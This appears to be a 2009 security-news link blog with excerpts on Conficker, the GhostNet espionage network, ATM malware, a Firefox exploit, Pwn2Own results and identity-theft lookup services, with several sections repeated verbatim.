A good write up of some of the stuff Microsoft is doing to disrupt the Conficker worm.
http://blogs.technet.com/msrc/
----------
A write up from MS Security about ways to exploit the file gdiplus.dll, as in the recent EMF patch.
http://blogs.technet.com/srd/
----------
An interesting article on the method Conficker uses to patch machines after it infects them. Apparently it doesn't do a complete job of protecting the machines after it takes them over, so they can be detected.
' "Prior to our research, it was believed believed when Conficker infected computers, it patched them, so that one could not tell who's infected and who's not, and any vulnerable computer that was already infected was considered not vulnerable," Honeynet founder Lance Spitzner said.'
...
Over the weekend, the Cabal worked with the curators of a half-dozen organizations that maintain software vulnerability scanning tools, to help them build updates that would enable their tools to distinguish between Windows systems equipped with the official and rogue security patch. As a result, the new detection should be available now in free vulnerability scanners such as nMap, as well as vendor-driven scanning tools from Tenable, McAfee, nMap, nCircle and Qualys.
Posted by Brian Krebs Permalink
----------
Massive Chinese Espionage Network
The story broke in The New York Times yesterday:
In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.
[...]
Their sleuthing opened a window into a broader operation that, in less than two years, has infiltrated at least 1,295 computers in 103 countries, including many belonging to embassies, foreign ministries and other government offices, as well as the Dalai Lama's Tibetan exile centers in India, Brussels, London and New York.
The researchers, who have a record of detecting computer espionage, said they believed that in addition to the spying on the Dalai Lama, the system, which they called GhostNet, was focused on the governments of South Asian and Southeast Asian countries.
The Chinese government denies involvement. It's probably true; these networks tend to be run by amateur hackers with the tacit approval of the government, not the government itself. I wrote this on the topic last year.
It's only circumstantial evidence that the hackers are Chinese:
In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.
And here's the report, from the University of Toronto.
Good commentary by James Fallows:
My guess is that the "convenient instruments" hypothesis will eventually prove to be true (versus the "centrally controlled plot" scenario), if the "truth" of the case is ever fully determined. For reasons the Toronto report lays out, the episode looks more like the effort of groups of clever young hackers than a concentrated project of the People Liberation Army cyberwar division. But no one knows for certain, and further information about the case is definitely worth following.
An excellent article on Wired.com, and another on ArsTechnica.
----------
I love IT timelines: Mary Jo Foley: Users already honing their IE 9 wish lists
----------
Ahh, so this is why Firefox came out with a new version all of a sudden:
Mozilla kills Firefox Pwn2Own bug
----------
Accenture: Some clients are operating without annual budgets
Larry Dignan: For a few months now, it seemed as if enterprise technology spending was a month-to-month affair. Accenture confirmed that theory and cut its outlook for the rest of the year.
----------
GhostNet spy network phishes international victims
Chuck Miller March 30, 2009
The recently uncovered cyberespionage network named GhostNet made use of phishing malware to attack the nearly 1,300 computers that are said to have been compromised by servers traced to China.
----------
New variant of RSPlug Mac trojan
Angela Moscaritolo March 30, 2009
A new variant of the RSPlug trojan, which targets Apple machines, was recently discovered in the wild, but quickly was fixed.
----------
Google: No significant security issues with Google Docs
Chuck Miller March 27, 2009
Despite apparent security issues in Google Docs, the company is playing down the risks.
----------
Fatal attraction: Latest "delivery notice" trojan spews forth
Greg Masters March 27, 2009
A new torrent of spam, disguised as a message from package carrier DHL, is making its way into inboxes.
----------
Washington D.C. Restaurants Become Credit Card Cloning Hot Spots
Four former servers at three upscale Washington D.C. restaurants blocks from the White House were arrested last week for allegedly using covert skimming devices to clone customer credit card data, in a year-long counterfeiting operation that's put $750,000 in fraudulent charges on the plastic of Washington's elite.
...
The servers often earn up to $50 per card if they work at an upscale eatery, down to just $10 each if, as in a recent Florida case, the cards were stolen from a Burger King.
----------
Electronic Spy Network Focused on Dalai Lama and Embassy Computers
...
More than 1,200 computers at embassies, foreign ministries, news media outlets and non-governmental organizations based primarily in South and Southeast Asia have been infiltrated by the network since at least the spring of 2007, according to the researchers' detailed 53-page report. So have computers in the offices of the Dalai Lama, the Asian Development Bank and the Associated Press in the United Kingdom and Hong Kong.
----------
No, The Recession Is Not Driving People To Dial-Up
----------
Legal Group’s Neutrality Is Challenged
By ADAM LIPTAK 1:35 PM ET
Studies suggest that the American Bar Association gives better ratings to liberal nominees than conservative ones.
----------
Europe’s Solution: Take More Time Off
Can the idea of shorter workweeks take hold in the U.S?
----------
McAfee blog post about another fake AntiVirus program:
Another Day, Another Rogue Security Program
----------
Microsoft To Shutter Encarta, Read All About It On Wikipedia
Microsoft is preparing to shut down Encarta, the digital encyclopedia it first launched in 1993...
----------
Poken Peek
The Poken is a little USB stick you keep on your keychain. You link it to your online identities. To befriend other Poken owners, you just have to hold your Pokens together for a second, and they’ll exchange IDs through RFID. The Poken is popular in The Netherlands, not only among children, but adults too. No more need to exchange business cards.
----------
A DLP Program That May Actually Prevent Data Theft
Motorola CSO Bill Boni, Disney Company Information Security Director Dan Swartwood and British Telecom Senior Security Advisor Jason Stradley discuss what they've done to keep data out of enemy hands (Audio).
Read more
----------
Monday, March 30, 2009
Friday, March 27, 2009
Friday 03/27/09
March 26, Spamfighter – (Montana) Mountain West Bank consumers targeted by phishing scam.
http://www.spamfighter.com/News-12077-Mountain-West-Bank-Consumers-Targeted-by-Phishing-Scam.htm
----------
March 26, Associated Press – (New York) ‘Super’ test at ORNL. A high-tech power cable designed to prevent rolling blackouts caused by everything from a wayward squirrel to terrorists is being readied for New York City’s financial district. Now undergoing final tests at the Oak Ridge National Laboratory, the superconductor cable to be installed in Manhattan next year could prove key to the smart, secure, super grid of the future. Scientists fired 60,000 amps through a cable during a critical test on March 24 — an electrical jolt comparable to turning on the air conditioning in 2,000 homes at the same time. It was enough juice to lift a 1,000-pound bundle of conventional cable two feet off the ground. But nothing seemed to happen. No sparks, no sound, no movement. Chilled by liquid nitrogen to minus-321 degrees Fahrenheit, this cable becomes super-efficient when cool, carrying up to 10 times more electricity than a copper cable of the same diameter. It also has a unique, built-in, surge-suppressing capability. Power distribution now follows a hub-and-spoke design. That means the failure of a single power station can put a cluster of neighborhoods in the dark. This latest superconductor cable promises to link power stations so they can operate "more like an Internet" and back each other up. The $39 million project will lay superconductor cable linking two large Consolidated Edison Corp. substations about 1,000 feet apart serving thousands of people on Manhattan’s west side. Source: http://www.knoxnews.com/news/2009/mar/26/super-test-at-ornl/
----------
March 26, Economic Times – (International) Software labs warn of ATM virus that steals money from banks. Russia’s leading computer security labs have warned of a new software virus which infects Automatic Teller Machines (ATM) to steal money from bank accounts of their users. Two leading anti-virus software producers ‘Doctor Web’ and ‘Kaspersky Lab’ claimed to have discovered a new virus, in the networks of several bank ATMs, which is able to collect information from bank cards. "This is a malicious program intended to infect and survive in ATMs. It is possible that new software will appear, aimed at illegitimately using banking information and removing funds," an official of the Kaspersky Lab was quoted as saying by RIA Novosti news agency. He said the virus is a Trojan which is able to infect the popular American Diebold brand of ATMs, used in Russia and Ukraine. Judging by the programming code used, there is a high probability that the programmer comes from one of the former Soviet republics, he added. The computer security experts say the number of infected ATMs is minimal but individual bank cardholders will not be able to detect whether an ATM is infected or not. Source: http://economictimes.indiatimes.com/Infotech/ATM-virus-that-steals-money/articleshow/4319363.cms
-----------
March 26, Jakarta Post – (International) Bird flu suspect dies in Pekanbaru. A two-year-old boy, who had been intensively, treated for a suspected birdflu case, died in an isolated room at Arifin Achmad Hospital in Pekanbaru, Riau early Thursday morning. The boy was admitted as birdflu suspect last Friday after he had been treated at another hospital for six days. The hospital has yet to announce whether the boy died of birdflu because it was still waiting for nasal and throat swab test results from the health ministry laboratory in Jakarta. Source: http://www.thejakartapost.com/news/2009/03/26/bird-flu-suspect-dies-pekanbaru.html
----------
March 26, IDG News Service – (International) Firefox fix due next week after attack is published. Online attack code has been released targeting a critical, unpatched flaw in the Firefox browser. The attack code, written by a security researcher, was published on several security sites on March 25, sending Firefox developers scrambling to patch the issue. Until the flaw is patched, this code could be modified by attackers and used to sneak unauthorized software onto a Firefox user’s machine. Mozilla developers have already worked out a fix for the vulnerability. It is slated to ship in the upcoming 3.0.8 release of the browser, which developers are now characterizing as a "high-priority firedrill security update," thanks to the attack code. That update is expected sometime early next week. "We... consider this a critical issue," said the Mozilla director of security engineering in an e-mail. The bug affects Firefox on all operating systems, including Mac OS and Linux, according to Mozilla developer notes on the issue. By tricking a victim into viewing a maliciously coded XML file, an attacker could use this bug to install unauthorized software on a victim’s system. This kind of Web-based malware, called a drive-by download, has become increasingly popular in recent years. While the public release of browser attack code does not happen all that often, security researchers do not seem to have much trouble finding bugs in browser software. Last week, two hackers at the CanSecWest security conference dug up four separate bugs in the Firefox, IE, and Safari browsers. Source: http://www.networkworld.com/news/2009/032609-firefox-fix-due-next-week.html
----------
March 26, Bit-Tech.net – (International) Worm targets Linux routers. Users of Linux-based routers are being warned of a new worm in the wild which attempts to take control and add their device to a growing botnet.
http://www.bit-tech.net/news/bits/2009/03/26/worm-targets-linux-routers/1
http://www.spamfighter.com/News-12077-Mountain-West-Bank-Consumers-Targeted-by-Phishing-Scam.htm
----------
March 26, Associated Press – (New York) ‘Super’ test at ORNL. A high-tech power cable designed to prevent rolling blackouts caused by everything from a wayward squirrel to terrorists is being readied for New York City’s financial district. Now undergoing final tests at the Oak Ridge National Laboratory, the superconductor cable to be installed in Manhattan next year could prove key to the smart, secure, super grid of the future. Scientists fired 60,000 amps through a cable during a critical test on March 24 — an electrical jolt comparable to turning on the air conditioning in 2,000 homes at the same time. It was enough juice to lift a 1,000-pound bundle of conventional cable two feet off the ground. But nothing seemed to happen. No sparks, no sound, no movement. Chilled by liquid nitrogen to minus-321 degrees Fahrenheit, this cable becomes super-efficient when cool, carrying up to 10 times more electricity than a copper cable of the same diameter. It also has a unique, built-in, surge-suppressing capability. Power distribution now follows a hub-and-spoke design. That means the failure of a single power station can put a cluster of neighborhoods in the dark. This latest superconductor cable promises to link power stations so they can operate "more like an Internet" and back each other up. The $39 million project will lay superconductor cable linking two large Consolidated Edison Corp. substations about 1,000 feet apart serving thousands of people on Manhattan’s west side. Source: http://www.knoxnews.com/news/2009/mar/26/super-test-at-ornl/
----------
March 26, Economic Times – (International) Software labs warn of ATM virus that steals money from banks. Russia’s leading computer security labs have warned of a new software virus which infects Automatic Teller Machines (ATM) to steal money from bank accounts of their users. Two leading anti-virus software producers ‘Doctor Web’ and ‘Kaspersky Lab’ claimed to have discovered a new virus, in the networks of several bank ATMs, which is able to collect information from bank cards. "This is a malicious program intended to infect and survive in ATMs. It is possible that new software will appear, aimed at illegitimately using banking information and removing funds," an official of the Kaspersky Lab was quoted as saying by RIA Novosti news agency. He said the virus is a Trojan which is able to infect the popular American Diebold brand of ATMs, used in Russia and Ukraine. Judging by the programming code used, there is a high probability that the programmer comes from one of the former Soviet republics, he added. The computer security experts say the number of infected ATMs is minimal but individual bank cardholders will not be able to detect whether an ATM is infected or not. Source: http://economictimes.indiatimes.com/Infotech/ATM-virus-that-steals-money/articleshow/4319363.cms
-----------
March 26, Jakarta Post – (International) Bird flu suspect dies in Pekanbaru. A two-year-old boy, who had been intensively, treated for a suspected birdflu case, died in an isolated room at Arifin Achmad Hospital in Pekanbaru, Riau early Thursday morning. The boy was admitted as birdflu suspect last Friday after he had been treated at another hospital for six days. The hospital has yet to announce whether the boy died of birdflu because it was still waiting for nasal and throat swab test results from the health ministry laboratory in Jakarta. Source: http://www.thejakartapost.com/news/2009/03/26/bird-flu-suspect-dies-pekanbaru.html
----------
March 26, IDG News Service – (International) Firefox fix due next week after attack is published. Online attack code has been released targeting a critical, unpatched flaw in the Firefox browser. The attack code, written by a security researcher, was published on several security sites on March 25, sending Firefox developers scrambling to patch the issue. Until the flaw is patched, this code could be modified by attackers and used to sneak unauthorized software onto a Firefox user’s machine. Mozilla developers have already worked out a fix for the vulnerability. It is slated to ship in the upcoming 3.0.8 release of the browser, which developers are now characterizing as a "high-priority firedrill security update," thanks to the attack code. That update is expected sometime early next week. "We... consider this a critical issue," said the Mozilla director of security engineering in an e-mail. The bug affects Firefox on all operating systems, including Mac OS and Linux, according to Mozilla developer notes on the issue. By tricking a victim into viewing a maliciously coded XML file, an attacker could use this bug to install unauthorized software on a victim’s system. This kind of Web-based malware, called a drive-by download, has become increasingly popular in recent years. While the public release of browser attack code does not happen all that often, security researchers do not seem to have much trouble finding bugs in browser software. Last week, two hackers at the CanSecWest security conference dug up four separate bugs in the Firefox, IE, and Safari browsers. Source: http://www.networkworld.com/news/2009/032609-firefox-fix-due-next-week.html
----------
March 26, Bit-Tech.net – (International) Worm targets Linux routers. Users of Linux-based routers are being warned of a new worm in the wild which attempts to take control and add their device to a growing botnet.
http://www.bit-tech.net/news/bits/2009/03/26/worm-targets-linux-routers/1
Wednesday, March 25, 2009
Wednesday 03/25/09
New ransomware holds Windows files hostage, demands $50 Cybercrooks have found a new way of marketing fake security software, and are duping users into downloading a file utility that holds users' data for ransom, security researchers warned today. Read more...
----------
Senate committee demands DHS explain alleged lack of support for cybersecurity office
The Senate Homeland Security Committee's senior-most Republican is asking DHS Secretary Janet Napolitano to explain why the National Cyber Security Center (NCSC), set up within the department last year, has seemingly been marginalized by the agency.
----------
Heartland warns rivals about 'baseless' claims on postbreach Visa action
Heartland Payment Systems Inc. is warning rivals of possible legal action if they don't stop trying to lure away its customers by hinting that continuing to do business with the breached payment processor could expose companies to fines by Visa Inc. for noncompliance with the PCI data security rules.
In a message posted on Heartland's Web site on Monday, CEO Robert Carr said the company plans to sue competitors that don't "immediately" stop making what he described as "baseless and unlawful" claims related to Visa's removal of Heartland from its list of service providers that comply with the PCI rules (download PDF).
...
----------
Microsoft updates WGA to hunt down counterfeit Windows XP Pro
March 25, 2009 (Computerworld) Microsoft Corp., tacitly acknowledging the continued popularity of Windows XP, said yesterday that it was updating the operating system's antipiracy technology to detect illegal copies installed with newlystolen or faked product keys, or with new activation cracks.
In an entry to a company blog, Alex Kochis, director of Microsoft's Genuine Windows group, spelled out the update to WGA Notifications. That's the antipiracy component that provides the messages and other on-screen prompts when the other half of WGA, dubbed Validations, detects an illegal copy of the operating system.
----------
Cisco security updates squash router bugs
Eight big, new advisories that came out Today (Wednesday): http://www.cisco.com/en/US/products/products_security_advisories_listing.html
The patches were released today, the day Cisco had previously scheduled for its twice-yearly IOS updates. None of the bugs have been publicly disclosed ahead of today's updates, but some of them were reported to Cisco by outside sources.
The eight updates fix 11 security vulnerabilities, according to Jean Reese, senior manager with Cisco's Product Security Incident Response Team.
----------
Adobe details secret PDF patches
Adobe Systems Inc. revealed today that it patched five critical vulnerabilities behind the scenes when it updated its Reader and Acrobat applications earlier this month to fix a bug already under attack.
According to a security bulletin issued today, the updates to Reader 9.1 and Acrobat 9.1 that Adobe delivered on March 10 included patches for not just one bug -- as Adobe indicated at the time -- but for five other vulnerabilities as well.
Foremost among the five were a quartet of bugs in Adobe's handling of JBIG2 compressed images, which was also at the root of the original vulnerability made public in February. When Adobe updated Reader and Acrobat to Version 9.1 two weeks ago, it fixed all five JBIG2 flaws, though it admitted only to the one at the time.
That bug has been used by hackers since at least early January, when they began sending malformed PDF files to users as e-mail attachments.
----------
China becoming the world's malware factory
With China's economy cooling down, some of the country's IT professionals are turning to cybercrime, according to a Beijing-based security expert.
Speaking at the CanSecWest security conference last week, Wei Zhao, CEO of Knownsec, a Beijing security company, said that while many Chinese workers may be feeling hard times, business is still booming in the country's cybercrime industry. "As the stock market dropped like a stone, a lot of IT professionals lost lots of money on the stock market," he said. "So sometimes they sell zero days," he said, referring to previously unknown software bugs.
"China is not only the world's factory, but also the world's malware factory," Zhao said.
----------
Nasty New Worm Targets Home Routers, Cable Modems
PC World - Wed Mar 25, 11:30 AM ET
A computer worm has been discovered that can infect 55 different home-based routers and DSL/cable modems including common brands like Linksys and Netgear.
----------
Teen hacker turns corporate cyber-crime consultant
AP - Wed Mar 25, 9:13 AM ET
WELLINGTON, New Zealand - A New Zealand teenager who helped a crime gang hack into more than 1 million computers worldwide and skim millions of dollars from bank accounts has a new job as a security consultant for a telecom company.
----------
Macs: Not as Secure as We Thought?
When it comes to technology, security is a relative term.
----------
Web Scam Nets Criminals $10,800 a Day
No crunch here, finds Finjan.
----------
Senate committee demands DHS explain alleged lack of support for cybersecurity office
The Senate Homeland Security Committee's senior-most Republican is asking DHS Secretary Janet Napolitano to explain why the National Cyber Security Center (NCSC), set up within the department last year, has seemingly been marginalized by the agency.
----------
Heartland warns rivals about 'baseless' claims on postbreach Visa action
Heartland Payment Systems Inc. is warning rivals of possible legal action if they don't stop trying to lure away its customers by hinting that continuing to do business with the breached payment processor could expose companies to fines by Visa Inc. for noncompliance with the PCI data security rules.
In a message posted on Heartland's Web site on Monday, CEO Robert Carr said the company plans to sue competitors that don't "immediately" stop making what he described as "baseless and unlawful" claims related to Visa's removal of Heartland from its list of service providers that comply with the PCI rules (download PDF).
...
----------
Microsoft updates WGA to hunt down counterfeit Windows XP Pro
March 25, 2009 (Computerworld) Microsoft Corp., tacitly acknowledging the continued popularity of Windows XP, said yesterday that it was updating the operating system's antipiracy technology to detect illegal copies installed with newlystolen or faked product keys, or with new activation cracks.
In an entry to a company blog, Alex Kochis, director of Microsoft's Genuine Windows group, spelled out the update to WGA Notifications. That's the antipiracy component that provides the messages and other on-screen prompts when the other half of WGA, dubbed Validations, detects an illegal copy of the operating system.
----------
Cisco security updates squash router bugs
Eight big, new advisories that came out Today (Wednesday): http://www.cisco.com/en/US/products/products_security_advisories_listing.html
The patches were released today, the day Cisco had previously scheduled for its twice-yearly IOS updates. None of the bugs have been publicly disclosed ahead of today's updates, but some of them were reported to Cisco by outside sources.
The eight updates fix 11 security vulnerabilities, according to Jean Reese, senior manager with Cisco's Product Security Incident Response Team.
----------
Adobe details secret PDF patches
Adobe Systems Inc. revealed today that it patched five critical vulnerabilities behind the scenes when it updated its Reader and Acrobat applications earlier this month to fix a bug already under attack.
According to a security bulletin issued today, the updates to Reader 9.1 and Acrobat 9.1 that Adobe delivered on March 10 included patches for not just one bug -- as Adobe indicated at the time -- but for five other vulnerabilities as well.
Foremost among the five were a quartet of bugs in Adobe's handling of JBIG2 compressed images, which was also at the root of the original vulnerability made public in February. When Adobe updated Reader and Acrobat to Version 9.1 two weeks ago, it fixed all five JBIG2 flaws, though it admitted only to the one at the time.
That bug has been used by hackers since at least early January, when they began sending malformed PDF files to users as e-mail attachments.
----------
China becoming the world's malware factory
With China's economy cooling down, some of the country's IT professionals are turning to cybercrime, according to a Beijing-based security expert.
Speaking at the CanSecWest security conference last week, Wei Zhao, CEO of Knownsec, a Beijing security company, said that while many Chinese workers may be feeling hard times, business is still booming in the country's cybercrime industry. "As the stock market dropped like a stone, a lot of IT professionals lost lots of money on the stock market," he said. "So sometimes they sell zero days," he said, referring to previously unknown software bugs.
"China is not only the world's factory, but also the world's malware factory," Zhao said.
----------
Nasty New Worm Targets Home Routers, Cable Modems
PC World - Wed Mar 25, 11:30 AM ET
A computer worm has been discovered that can infect 55 different home-based routers and DSL/cable modems including common brands like Linksys and Netgear.
----------
Teen hacker turns corporate cyber-crime consultant
AP - Wed Mar 25, 9:13 AM ET
WELLINGTON, New Zealand - A New Zealand teenager who helped a crime gang hack into more than 1 million computers worldwide and skim millions of dollars from bank accounts has a new job as a security consultant for a telecom company.
----------
Macs: Not as Secure as We Thought?
When it comes to technology, security is a relative term.
----------
Web Scam Nets Criminals $10,800 a Day
No crunch here, finds Finjan.
Monday, March 23, 2009
Monday 03/23/09
Crooks Flock to Rogue Antivirus Apps
PC World - Fri Mar 20, 1:28 PM ET
Chasing massive profits, crooks have unleased a flood of rogue antivirus programs that attempt to fool or scare unsuspecting PC users into forking over cash for an app that does nothing worthwhile.
----------
A Search Is Launched for Conficker's First Victim
PC World - Fri Mar 20, 4:20 AM ET
Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date. (Here's how to protect yourself.)
----------
A scholarly paper on the Conficker worm from SRI International:
http://mtc.sri.com/Conficker/addendumC/
A sample line from the report: "One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population."
----------
Microsoft's IE8 Catches Most 'Social Malware'
PC Magazine - Fri Mar 20, 11:23 AM ET A study by NSS Labs of 6 major web browsers shows a large difference in their ability to block "socially engineered malware." The study was funded by Microsoft.
----------
A Hacking Tool Gets Updated for the Mac
PC World - Thu Mar 19, 6:10 PM ET
Two well-known Mac hackers are updating a widely used hacking toolkit, making it easier to take control of a Macintosh computer.
----------
Mar 23, 12:30 am
Symantec Says Credit Card Data May Have Leaked From India
Security firm tops routing calls to Indian call center after BBC report of data theft.
----------
Mar 22, 10:12 am
Diebold Admits Voting Machine Flaw
Software errors may have lost votes in California election.
----------
Mar 21, 12:06 pm
Online Fraud Hits Airlines Hard
A report finds airlines worldwide lost more than $1.4 billion to fraudsters in 2008.
----------
Mar 20, 1:44 pm
Doctors Say Effort to Digitize Medical Records Is Not Worth It
Harvard Medical School doctors warn that the shift to electronic medical records is not worth $19 billion of the stimulus pie.
----------
Small Business: The New Black In Cybercrime Targets
Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises
----------
One of several articles about building a "cheap" security lab:
http://www.darkreading.com/security/management/showArticle.jhtml;jsessionid=TVBA1NCUEKJQUQSNDLOSKHSCJUNN2JVN?articleID=215901457
----------
A group has formed to combat the latest worm. The "Conficker Cabal" has the stated purpose to block, defeat and uninstall all copies of this worm. The announcement of the start of this group is here from Feb 12th, 2009:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
----------
Good article from SANS on Incident Handling. They break the process into six steps:
Preparation
Identification
Containment
Eradication
Recovery
Lessons learned
This article is on Preparation: Making the most of your runbooks
----------
Kentucky e-voting fraud manipulated voters, not machines
about 19 hours ago - by Jon Stokes Posted in: Law & Disorder
Six people have been indicted in a Kentucky scandal that involves rigging an election by manipulating vote totals in electronic voting machines. But the folks allegedly behind the scam relied not on high-tech hacking skills, but on old-fashioned southern charm.
Read more
----------
Web Fraud 2.0: Data Search Tools for ID Thieves
Permalink
Posted at 11:30 AM ET, 03/23/2009
...
For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.
Another set of three $3 payments allowed me to gather the mother's maiden name (MMN) on half of the volunteers. For both the SSN and MMN lookups, all that is required is the target's name, street number, and ZIP code.
...
Using the service pictured above, customers can check the available balance on a credit card for a $1 payment, by including just the credit card number, the name of the cardholder, and his or her address. According to one source who is investigating the back-end technology behind this credit card balance-checking service, the site's operators are dialing in to the automated voice response units at various card issuers, using Skype.
...
Other data points that users can query the target's date of birth (50 cents per lookup); mother's date of birth ($6); drivers license number ($8); background report ($15); and credit report ($24). The site also offers a service that automates the changing the billing address on a target's credit or debit card ($35).
----------
Justice Department Increasingly Looking Like The RIAA/MPAA's Legal Team
from the change-the-riaa-can-believe-in dept
It seems that the Obama administration is basically hiring the entire RIAA/MPAA/BSA legal team these days. It started off with the RIAA's favorite lawyer, then it hired the BSA's antipiracy enforcer, and now it's brought on two more of the entertainment industry's favorite lawyers, including Don Verrilli, who was one of the main guys arguing the entertainment industry's side in the infamous (and terribly decided) Grokster case. He also was the guy who argued the RIAA's case that the Jammie Thomas verdict shouldn't be thrown out (on that one, he lost, thankfully). Of course, if you're thinking things would have been any better had McCain won, just note that one of his legal advisors is gleefully cheering on these appointments. Still, as Ray Beckerman notes, Obama's own rules should preclude these guys working on issues related to those they used to represent. We'll see if that actually happens, though.
PC World - Fri Mar 20, 1:28 PM ET
Chasing massive profits, crooks have unleased a flood of rogue antivirus programs that attempt to fool or scare unsuspecting PC users into forking over cash for an app that does nothing worthwhile.
----------
A Search Is Launched for Conficker's First Victim
PC World - Fri Mar 20, 4:20 AM ET
Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date. (Here's how to protect yourself.)
----------
A scholarly paper on the Conficker worm from SRI International:
http://mtc.sri.com/Conficker/addendumC/
A sample line from the report: "One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population."
----------
Microsoft's IE8 Catches Most 'Social Malware'
PC Magazine - Fri Mar 20, 11:23 AM ET A study by NSS Labs of 6 major web browsers shows a large difference in their ability to block "socially engineered malware." The study was funded by Microsoft.
----------
A Hacking Tool Gets Updated for the Mac
PC World - Thu Mar 19, 6:10 PM ET
Two well-known Mac hackers are updating a widely used hacking toolkit, making it easier to take control of a Macintosh computer.
----------
Mar 23, 12:30 am
Symantec Says Credit Card Data May Have Leaked From India
Security firm tops routing calls to Indian call center after BBC report of data theft.
----------
Mar 22, 10:12 am
Diebold Admits Voting Machine Flaw
Software errors may have lost votes in California election.
----------
Mar 21, 12:06 pm
Online Fraud Hits Airlines Hard
A report finds airlines worldwide lost more than $1.4 billion to fraudsters in 2008.
----------
Mar 20, 1:44 pm
Doctors Say Effort to Digitize Medical Records Is Not Worth It
Harvard Medical School doctors warn that the shift to electronic medical records is not worth $19 billion of the stimulus pie.
----------
Small Business: The New Black In Cybercrime Targets
Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises
----------
One of several articles about building a "cheap" security lab:
http://www.darkreading.com/security/management/showArticle.jhtml;jsessionid=TVBA1NCUEKJQUQSNDLOSKHSCJUNN2JVN?articleID=215901457
----------
A group has formed to combat the latest worm. The "Conficker Cabal" has the stated purpose to block, defeat and uninstall all copies of this worm. The announcement of the start of this group is here from Feb 12th, 2009:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
----------
Good article from SANS on Incident Handling. They break the process into six steps:
Preparation
Identification
Containment
Eradication
Recovery
Lessons learned
This article is on Preparation: Making the most of your runbooks
----------
Kentucky e-voting fraud manipulated voters, not machines
about 19 hours ago - by Jon Stokes Posted in: Law & Disorder
Six people have been indicted in a Kentucky scandal that involves rigging an election by manipulating vote totals in electronic voting machines. But the folks allegedly behind the scam relied not on high-tech hacking skills, but on old-fashioned southern charm.
Read more
----------
Web Fraud 2.0: Data Search Tools for ID Thieves
Permalink
Posted at 11:30 AM ET, 03/23/2009
...
For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.
Another set of three $3 payments allowed me to gather the mother's maiden name (MMN) on half of the volunteers. For both the SSN and MMN lookups, all that is required is the target's name, street number, and ZIP code.
...
Using the service pictured above, customers can check the available balance on a credit card for a $1 payment, by including just the credit card number, the name of the cardholder, and his or her address. According to one source who is investigating the back-end technology behind this credit card balance-checking service, the site's operators are dialing in to the automated voice response units at various card issuers, using Skype.
...
Other data points that users can query the target's date of birth (50 cents per lookup); mother's date of birth ($6); drivers license number ($8); background report ($15); and credit report ($24). The site also offers a service that automates the changing the billing address on a target's credit or debit card ($35).
----------
Justice Department Increasingly Looking Like The RIAA/MPAA's Legal Team
from the change-the-riaa-can-believe-in dept
It seems that the Obama administration is basically hiring the entire RIAA/MPAA/BSA legal team these days. It started off with the RIAA's favorite lawyer, then it hired the BSA's antipiracy enforcer, and now it's brought on two more of the entertainment industry's favorite lawyers, including Don Verrilli, who was one of the main guys arguing the entertainment industry's side in the infamous (and terribly decided) Grokster case. He also was the guy who argued the RIAA's case that the Jammie Thomas verdict shouldn't be thrown out (on that one, he lost, thankfully). Of course, if you're thinking things would have been any better had McCain won, just note that one of his legal advisors is gleefully cheering on these appointments. Still, as Ray Beckerman notes, Obama's own rules should preclude these guys working on issues related to those they used to represent. We'll see if that actually happens, though.
Friday, March 20, 2009
Friday 03/20/09
Researchers make wormy Twitter attack Computer security researchers have devised a new Twitter attack that they say could spread virally, much like a worm on the microblogging service. Read more...
----------
A search is launched for Conficker's first victim
March 20, 2009 (IDG News Service) Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date.
The university uses so-called Darknet sensors that were set up about six years ago to keep track of malicious activity. With funding from the U.S. Department of Homeland Security, computer scientists have banded together to share data collected from sensors around the world.
"The goal is to get close enough so you can actually start mapping out how the spread started," said Jon Oberheide, a University of Michigan graduate student who is working on the project.
...
----------
Post-breach criticism of PCI security standard misplaced, Visa exec says
Visa pilots new payment card security initiatives
Acknowledging the need for controls that go beyond those offered by the Payment Card Industry (PCI) Data Security Standard, a senior Visa Inc. executive today described two new initiatives to reduce payment card fraud being tested by the company.
One of the pilots involves Fifth Third Bank, which is testing the use of magnetic stripe technology to create unique digital fingerprints for cards, said Ellen Richey, Visa's chief enterprise risk officer. Each stripe contains unique characteristics that can be captured and used to verify the digital identity of the card, Richey said at a security event being hosted by Visa today. The goal is to stop the creation and use of counterfeit cards based on stolen payment card data.
----------
Expert: Hackers penetrating industrial control systems
----------
Researcher hacks just-launched IE8
...
Just hours before Microsoft Corp. officially launched the final code for Internet Explorer 8, a German researcher yesterday hacked the browser during the PWN2OWN contest to win $5,000 and a Sony Viao laptop.
The researcher, a computer science student from Germany who would only give his first name, Nils, broke into the Sony within minutes by exploiting a previously unknown vulnerability in the new browser, said Terri Forslof, manager of security response at 3Com Corp.'s TippingPoint, the contest sponsor. The laptop was running what Forslof described as a "recent Microsoft internal build" of Windows 7.
...
----------
Researcher cracks Mac in 10 seconds at PWN2OWN, wins $5k
...
"I can't talk about the details of the vulnerability, but it was a Mac, fully patched, with Safari, fully patched," said Miller on Wednesday, not long after he had won the prize. "It probably took five or 10 seconds." He confirmed that he had researched and written the exploit before he arrived at the challenge.
...
----------
Harvard professor apologizes to judge for faulty motion in RIAA music piracy case
In yet another twist to a music piracy case that already has attracted lots of attention, a Harvard University law professor who is defending a Boston University graduate student accused of copyright infringement by the Recording Industry Association of America (RIAA) apologized this week to a federal judge in Boston for wasting the court's time with one of his motions.
